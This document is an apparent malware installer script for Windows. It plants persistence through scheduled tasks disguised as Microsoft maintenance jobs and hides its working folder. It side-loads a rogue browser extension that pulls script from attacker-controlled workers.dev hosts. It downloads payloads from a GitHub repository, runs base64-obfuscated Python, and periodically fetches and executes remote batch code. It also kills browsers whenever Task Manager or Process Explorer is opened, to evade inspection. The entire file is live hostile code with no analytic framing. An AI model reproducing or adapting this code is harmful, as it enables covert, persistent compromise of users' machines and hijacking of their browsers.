Stage3.ps1

powershell if( (Get-WinSystemLocale).name -notmatch 'en-' ){ TASKKILL /F /IM cmd.exe /T }



mkdir C:\systemfile
cd C:\systemfile
attrib +s +h "C:\systemfile" /d






echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp.xml
echo     ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp.xml
echo   ^<Triggers^> >> C:\systemfile\temp.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp.xml
echo       ^<Repetition^> >> C:\systemfile\temp.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp.xml
echo       ^</Repetition^> >> C:\systemfile\temp.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml
echo       ^<Delay^>PT68S^</Delay^> >> C:\systemfile\temp.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp.xml
echo   ^</Triggers^> >> C:\systemfile\temp.xml
echo   ^<Principals^> >> C:\systemfile\temp.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp.xml
echo     ^</Principal^> >> C:\systemfile\temp.xml
echo   ^</Principals^> >> C:\systemfile\temp.xml
echo   ^<Settings^> >> C:\systemfile\temp.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp.xml
echo   ^</Settings^> >> C:\systemfile\temp.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp.xml
echo     ^<Exec^> >> C:\systemfile\temp.xml
echo       ^<Command^>cmd.exe^</Command^> >> C:\systemfile\temp.xml
echo       ^<Arguments^>/c more c.z ^| cmd ^& more ^%USERPROFILE^%\Downloads\c.z ^| cmd^</Arguments^> >> C:\systemfile\temp.xml
echo       ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp.xml
echo     ^</Exec^> >> C:\systemfile\temp.xml
echo   ^</Actions^> >> C:\systemfile\temp.xml
echo ^</Task^> >> C:\systemfile\temp.xml



schtasks /create /xml "C:\systemfile\temp.xml" /tn "\Microsoft\Windows\AppID\VerifiedCert" /F
Del "C:\systemfile\temp.xml"











echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp2.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp2.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp2.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp2.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp2.xml
echo     ^<Description^>Regular browser Maintenance.^</Description^> >> C:\systemfile\temp2.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp2.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp2.xml
echo   ^<Triggers^> >> C:\systemfile\temp2.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp2.xml
echo       ^<Repetition^> >> C:\systemfile\temp2.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp2.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp2.xml
echo       ^</Repetition^> >> C:\systemfile\temp2.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml
echo       ^<Delay^>PT60S^</Delay^> >> C:\systemfile\temp2.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp2.xml
echo   ^</Triggers^> >> C:\systemfile\temp2.xml
echo   ^<Principals^> >> C:\systemfile\temp2.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp2.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp2.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp2.xml
echo     ^</Principal^> >> C:\systemfile\temp2.xml
echo   ^</Principals^> >> C:\systemfile\temp2.xml
echo   ^<Settings^> >> C:\systemfile\temp2.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp2.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp2.xml
echo     ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp2.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp2.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp2.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp2.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp2.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp2.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp2.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp2.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp2.xml
echo   ^</Settings^> >> C:\systemfile\temp2.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp2.xml
echo     ^<Exec^> >> C:\systemfile\temp2.xml
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" ^| findstr chrome`) DO set CHROMEPATH=%A %B
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\brave.exe" ^| findstr brave`) DO set BRAVEPATH=%A %B
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe" ^| findstr msedge`) DO set MSEDGEPATH=%A %B
echo "%CHROMEPATH%" | findstr /C:"chrome" >nul && ( echo "%CHROMEPATH%"  &   echo       ^<Command^>"%CHROMEPATH%"^</Command^> >> "C:\systemfile\temp2.xml"   ) || (  
echo "%BRAVEPATH%" | findstr /C:"brave" >nul && (   echo "%BRAVEPATH%"  &  echo       ^<Command^>"%BRAVEPATH%"^</Command^> >> "C:\systemfile\temp2.xml"      ) || (   
echo "%MSEDGEPATH%" | findstr /C:"msedge" >nul && (   echo "%MSEDGEPATH%"  &   echo       ^<Command^>"%MSEDGEPATH%"^</Command^> >> "C:\systemfile\temp2.xml"      ) || (del "C:\systemfile\temp2.xml" & Exit)	   ))

echo       ^<Arguments^> --tyqe=render --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 --lang=en-US --extension--process --origin--trial-disabled--features=SecurePaymentConfirmation --device-scale--factor=1 --num--raster-threads=2 --profile-directory=Default --enable--main-frame-before--activation www.google.com --renderer--client-id=6 --user-data-dir="C:\systemfile" --no-v8--untrusted-code-mitigations --load-extension="C:\systemfile" --mojo--platform-channel-handle=-3784 /prefetch:1^</Arguments^> >> C:\systemfile\temp2.xml
echo       ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp2.xml
echo     ^</Exec^> >> C:\systemfile\temp2.xml
echo   ^</Actions^> >> C:\systemfile\temp2.xml
echo ^</Task^> >> C:\systemfile\temp2.xml




schtasks /create /xml "C:\systemfile\temp2.xml" /tn "\Microsoft\Windows\Application Experience\Maintenance" /F
Del "C:\systemfile\temp2.xml"















attrib -s -h "C:\systemfile\c.z"
del C:\systemfile\c.z
echo cd C:\systemfile > C:\systemfile\c.z
echo mkdir C:\Windows\security >> C:\systemfile\c.z
echo Tasklist /FI "SESSION eq 0" ^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^>nul ^&^& ( start /b PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit"  ) >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/pywinveraa -o "C:\Windows\security\pywinveraa") >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/winver -o "C:\Windows\security\winver") >> C:\systemfile\c.z
echo ren "C:\Windows\security\winver" winver.png >> C:\systemfile\c.z
echo mkdir "C:\Windows\security\pywinvera" >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera\libs" ("C:\Windows\security\winver.png" x "C:\Windows\security\pywinveraa" -o"C:\Windows\security" ) >> C:\systemfile\c.z
echo del "C:\Windows\security\pywinveraa" >> C:\systemfile\c.z
echo del "C:\Windows\security\winver.png" >> C:\systemfile\c.z
echo. >> C:\systemfile\c.z
echo attrib -s -h "C:\systemfile\c.z" >> C:\systemfile\c.z
echo ^echo Tasklist /FI "SESSION eq 0" ^^^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^^^>nul ^^^&^^^& ( PowerShell.exe  "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit"  ) ^^^|^^^| (^^^Exit)^> ^C:\systemfile\c.z >> C:\systemfile\c.z
echo attrib +s +h "C:\systemfile\*" /s /d >> C:\systemfile\c.z
attrib +s +h "C:\systemfile\c.z"







echo { > C:\systemfile\manifest.json
echo   "name": "Chrome-edge-ext", >> C:\systemfile\manifest.json
echo   "version": "0.1", >> C:\systemfile\manifest.json
echo   "description": "Chrome-edge-ext..", >> C:\systemfile\manifest.json
echo   "permissions": [ >> C:\systemfile\manifest.json
echo     "<all_urls>", >> C:\systemfile\manifest.json
echo     "activeTab", >> C:\systemfile\manifest.json
echo     "tabs", >> C:\systemfile\manifest.json
echo     "downloads" >> C:\systemfile\manifest.json
echo   ], >> C:\systemfile\manifest.json
echo   "background": { >> C:\systemfile\manifest.json
echo     "page": "background.html", >> C:\systemfile\manifest.json
echo     "persistent": true >> C:\systemfile\manifest.json
echo   }, >> C:\systemfile\manifest.json
echo   "manifest_version": 2, >> C:\systemfile\manifest.json
echo   "content_security_policy": "script-src 'self' https://*.alexrybak0555.workers.dev/; object-src 'self'" >> C:\systemfile\manifest.json
echo } >> C:\systemfile\manifest.json




echo ^<script src="https://cdn2.alexrybak0555.workers.dev/"^>^</script^> > C:\systemfile\background.html







































echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp3.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp3.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp3.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp3.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp3.xml
echo     ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp3.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp3.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp3.xml
echo   ^<Principals^> >> C:\systemfile\temp3.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp3.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp3.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp3.xml
echo     ^</Principal^> >> C:\systemfile\temp3.xml
echo   ^</Principals^> >> C:\systemfile\temp3.xml
echo   ^<Settings^> >> C:\systemfile\temp3.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp3.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp3.xml
echo     ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp3.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp3.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp3.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp3.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp3.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp3.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp3.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp3.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp3.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp3.xml
echo   ^</Settings^> >> C:\systemfile\temp3.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp3.xml
echo     ^<Exec^> >> C:\systemfile\temp3.xml
echo       ^<Command^>python^</Command^> >> C:\systemfile\temp3.xml
echo       ^<Arguments^>-c ^"import base64;exec(base64.b64decode('aW1wb3J0IG9zLCBiYXNlNjQKIApTdHIgPSBsaXN0KG9wZW4oIkM6XFxzeXN0ZW1maWxlXFxvYnMubG9nIiwgbW9kZT0iciIsIGVuY29kaW5nPSJ1dGYtOCIpLnJlYWQoKS5yZXBsYWNlKCJcbiIsICIiKSkgCmZvciB4IGluIHJhbmdlKGxlbihTdHIpKToKICAgIFN0clt4XSA9IGNocihvcmQoU3RyW3hdKSAtIDEpIAogCmV4ZWMoYmFzZTY0LmI2NGRlY29kZSgiIi5qb2luKFN0cikpKQpvcy5wb3Blbignc2NodGFza3MgL2VuZCAvdG4gXE1pY3Jvc29mdFxXaW5kb3dzXFNlcnZpY2VzXENlcnRQYXRodycpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))^"^</Arguments^> >> C:\systemfile\temp3.xml
echo       ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp3.xml
echo     ^</Exec^> >> C:\systemfile\temp3.xml
echo   ^</Actions^> >> C:\systemfile\temp3.xml
echo ^</Task^> >> C:\systemfile\temp3.xml



schtasks /create /xml "C:\systemfile\temp3.xml" /tn "\Microsoft\Windows\Services\CertPathCheck" /F
Del "C:\systemfile\temp3.xml"





echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp4.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp4.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp4.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp4.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp4.xml
echo     ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp4.xml
echo     ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp4.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp4.xml
echo   ^<Principals^> >> C:\systemfile\temp4.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp4.xml
echo       ^<LogonType^>InteractiveToken^</LogonType^> >> C:\systemfile\temp4.xml
echo       ^<RunLevel^>HighestAvailable^</RunLevel^> >> C:\systemfile\temp4.xml
echo     ^</Principal^> >> C:\systemfile\temp4.xml
echo   ^</Principals^> >> C:\systemfile\temp4.xml
echo   ^<Settings^> >> C:\systemfile\temp4.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp4.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp4.xml
echo     ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp4.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp4.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp4.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp4.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp4.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp4.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp4.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp4.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp4.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp4.xml
echo   ^</Settings^> >> C:\systemfile\temp4.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp4.xml
echo     ^<Exec^> >> C:\systemfile\temp4.xml
echo       ^<Command^>pythonw^</Command^> >> C:\systemfile\temp4.xml
echo       ^<Arguments^>-c ^"import base64;exec(base64.b64decode('aW1wb3J0IGF1dG9pdCwgb3MKYXV0b2l0LmF1dG9faXRfc2V0X29wdGlvbigiV2luV2FpdERlbGF5IiwgMCkKYXV0b2l0Lndpbl93YWl0KCdbUkVHRVhQVElUTEU6KD9pKSguKlByb2Nlc3MgRXhwbG9yZXIuKnwuKlRhc2sgTWFuYWdlci4qfC4qU3lzdGVtIEV4cGxvcmVyLip8LipQcm9jZXNzIEhhY2tlci4qfC4qQW5WaXIgVGFzay4qfC4qV2luVXRpbGl0aWVzLiopXScpCm9zLnBvcGVuKCdUQVNLS0lMTCAvRiAvRkkgIlNFU1NJT04gZXEgMCIgL0lNIGNocm9tZS5leGUgL0lNIG1zZWRnZS5leGUgL0lNIGJyYXZlLmV4ZSAvSU0gcG93ZXJzaGVsbC5leGUgL0lNIHB5dGhvbi5leGUgL0lNIHB5dGhvbncuZXhlIC9JTSBjZHJpdmVyLmV4ZSAvSU0gbWRyaXZlci5leGUgL1QnKQpleGl0KCk='))^"^</Arguments^> >> C:\systemfile\temp4.xml
echo       ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp4.xml
echo     ^</Exec^> >> C:\systemfile\temp4.xml
echo   ^</Actions^> >> C:\systemfile\temp4.xml
echo ^</Task^> >> C:\systemfile\temp4.xml



schtasks /create /xml "C:\systemfile\temp4.xml" /tn "\Microsoft\Windows\Services\CertPathw" /F
Del "C:\systemfile\temp4.xml"





































cd C:\
where curl || powershell "(New-Object System.Net.WebClient).DownloadFile('https://github.com/alexrybak0444/New/raw/main/curl', 'C:\Windows\system32\curl.exe')"
cd C:\systemfile





echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp5.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp5.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp5.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp5.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp5.xml
echo     ^<Description^>left over Component Cleanup^</Description^> >> C:\systemfile\temp5.xml
echo     ^<URI^>\Microsoft\Windows\Servicing\ComponentCleanup^</URI^> >> C:\systemfile\temp5.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp5.xml
echo   ^<Triggers^> >> C:\systemfile\temp5.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp5.xml
echo       ^<Repetition^> >> C:\systemfile\temp5.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp5.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp5.xml
echo       ^</Repetition^> >> C:\systemfile\temp5.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp5.xml
echo   ^</Triggers^> >> C:\systemfile\temp5.xml
echo   ^<Principals^> >> C:\systemfile\temp5.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp5.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp5.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp5.xml
echo     ^</Principal^> >> C:\systemfile\temp5.xml
echo   ^</Principals^> >> C:\systemfile\temp5.xml
echo   ^<Settings^> >> C:\systemfile\temp5.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp5.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp5.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp5.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp5.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp5.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp5.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp5.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp5.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp5.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp5.xml
echo   ^</Settings^> >> C:\systemfile\temp5.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp5.xml
echo     ^<Exec^> >> C:\systemfile\temp5.xml
echo       ^<Command^>curl^</Command^> >> C:\systemfile\temp5.xml
echo       ^<Arguments^>https://autobat.alexrybak0444.workers.dev/ -o ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp5.xml
echo     ^</Exec^> >> C:\systemfile\temp5.xml
echo   ^</Actions^> >> C:\systemfile\temp5.xml
echo ^</Task^> >> C:\systemfile\temp5.xml

schtasks /create /xml "C:\systemfile\temp5.xml" /tn "\Microsoft\Windows\Servicing\ComponentCleanup" /F
Del "C:\systemfile\temp5.xml"








echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp6.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp6.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp6.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp6.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp6.xml
echo     ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp6.xml
echo     ^<URI^>\Microsoft\Windows\Servicing\ServiceCleanup^</URI^> >> C:\systemfile\temp6.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp6.xml
echo   ^<Triggers^> >> C:\systemfile\temp6.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp6.xml
echo       ^<Repetition^> >> C:\systemfile\temp6.xml
echo         ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp6.xml
echo         ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp6.xml
echo       ^</Repetition^> >> C:\systemfile\temp6.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml
echo       ^<Delay^>PT8S^</Delay^> >> C:\systemfile\temp6.xml
echo     ^</LogonTrigger^> >> C:\systemfile\temp6.xml
echo   ^</Triggers^> >> C:\systemfile\temp6.xml
echo   ^<Principals^> >> C:\systemfile\temp6.xml
echo     ^<Principal id="LocalService"^> >> C:\systemfile\temp6.xml
echo       ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp6.xml
echo       ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp6.xml
echo     ^</Principal^> >> C:\systemfile\temp6.xml
echo   ^</Principals^> >> C:\systemfile\temp6.xml
echo   ^<Settings^> >> C:\systemfile\temp6.xml
echo     ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp6.xml
echo     ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp6.xml
echo     ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp6.xml
echo     ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp6.xml
echo     ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp6.xml
echo     ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml
echo     ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp6.xml
echo     ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp6.xml
echo     ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp6.xml
echo     ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp6.xml
echo     ^<Priority^>10^</Priority^> >> C:\systemfile\temp6.xml
echo   ^</Settings^> >> C:\systemfile\temp6.xml
echo   ^<Actions Context="LocalService"^> >> C:\systemfile\temp6.xml
echo     ^<Exec^> >> C:\systemfile\temp6.xml
echo       ^<Command^>cmd^</Command^> >> C:\systemfile\temp6.xml
echo       ^<Arguments^>/c type ^%temp^%\c4329f-4b8b33e-fa4fffe0 ^| cmd ^&^& del ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp6.xml
echo     ^</Exec^> >> C:\systemfile\temp6.xml
echo   ^</Actions^> >> C:\systemfile\temp6.xml
echo ^</Task^> >> C:\systemfile\temp6.xml

schtasks /create /xml "C:\systemfile\temp6.xml" /tn "\Microsoft\Windows\Servicing\ServiceCleanup" /F
Del "C:\systemfile\temp6.xml"












echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp7.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp7.xml
echo   ^<RegistrationInfo^> >> C:\systemfile\temp7.xml
echo     ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp7.xml
echo     ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp7.xml
echo     ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp7.xml
echo     ^<URI^>\Microsoft\Windows\Shell\ObjectTask^</URI^> >> C:\systemfile\temp7.xml
echo   ^</RegistrationInfo^> >> C:\systemfile\temp7.xml
echo   ^<Triggers^> >> C:\systemfile\temp7.xml
echo     ^<LogonTrigger^> >> C:\systemfile\temp7.xml
echo       ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml
echo       ^<Delay^>PT7S^</Delay^> >> C:\systemfile\temp7.xml
